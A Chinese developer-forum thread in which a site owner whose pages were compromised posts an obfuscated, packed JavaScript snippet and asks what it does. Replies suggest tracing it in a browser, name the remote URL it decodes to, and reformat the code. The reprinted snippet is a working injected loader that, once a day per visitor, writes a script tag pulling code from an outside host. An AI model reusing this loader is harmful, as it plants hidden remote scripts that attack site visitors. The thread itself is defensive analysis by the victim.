网站被挂马麻烦高手,看一段加密的js代码。

if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b.h(\'<0 5=6://4%7.%3%1.c%2.c%8/e%f/%d.g%9?a¨></0>\')',18,18,'script|67c|6Fm|68m|w|src|http|77w|6E|69f|xuexi|document||67|A|64||write'.split('|'),0,{}));}
麻烦解密下。并告诉我这段代码的作用。

解决方案 »

  1.   

    弄出来执行一次,用firefox跟踪一下不就可以了
      

  2.   

    http://www.hmgc.com.cn/Ad/g.gif?xuexi 帮你看了一下 最后返回这个,里面貌似是一个汽车相关的东东
      

  3.   

    if(document.cookie.indexOf('hello')==-1)
    {
          var expires=newDate();
          expires.setTime(expires.getTime()+24*60*60*1000);
          document.cookie='hello=Yes;
          path=/;
          expires='+expires.toGMTString()
          eval(
                  function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b.h(\'<0 5=6://4%7.%3%1.c%2.c%8/e%f/%d.g%9?a¨></0>\')',18,18,'script|67c|6Fm|68m|w|src|http|77w|6E|69f|xuexi|document||67|A|64||write'.split('|'),0,{}));}
    实在看不下去了
      

  4.   


    if(document.cookie.indexOf("hello")==-1){
      var expires=new Date();
      expires.setTime(expires.getTime()+24*60*60*1000);
      document.cookie="hello=Yes;path=/;expires="+expires.toGMTString();
      eval(function(p,a,c,k,e,d){
        e=function(c){
          return c.toString(36);
        };
        if(!"".replace(/^/,String)){
          while(c--){
            d[c.toString(a)]=k[c]||c.toString(a);
          }
          k=[function(e){
            return d[e];
          }];
          e=function(){
            return "\\w+";
          };
          c=1;
        }
        while(c--){
          if(k[c]){
            p=p.replace(new RegExp("\\b"+e(c)+"\\b","g"),k[c]);
          }
        }
        return p;
      }("b.h('<0 5=6://4%7.%3%1.c%2.c%8/e%f/%d.g%9?a\xa8></0>')",18,18,"script|67c|6Fm|68m|w|src|http|77w|6E|69f|xuexi|document||67|A|64||write".split("|"),0,{}));
    }
      

  5.   

    if (document.cookie.indexOf('hello') == -1) {
        var expires = new Date();
        expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
        document.cookie = 'hello=Yes;path=/;expires=' + expires.toGMTString()
        eval(function (p, a, c, k, e, d) {
            e = function (c) {
                return c.toString(36)
            };
            if (!''.replace(/^/, String)) {
                while (c--) {
                    d[c.toString(a)] = k[c] || c.toString(a)
                }
                k = [function (e) {
                    return d[e]
                }];
                e = function () {
                    return '\\w+'
                };
                c = 1
            };
            while (c--) {
                if (k[c]) {
                    p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
                }
            }
            return p
        }('b.h(\'<0 5=6://4%7.%3%1.c%2.c%8/e%f/%d.g%9?a¨></0>\')', 18, 18, 'script|67c|6Fm|68m|w|src|http|77w|6E|69f|xuexi|document||67|A|64||write'.split('|'), 0, {}));
    }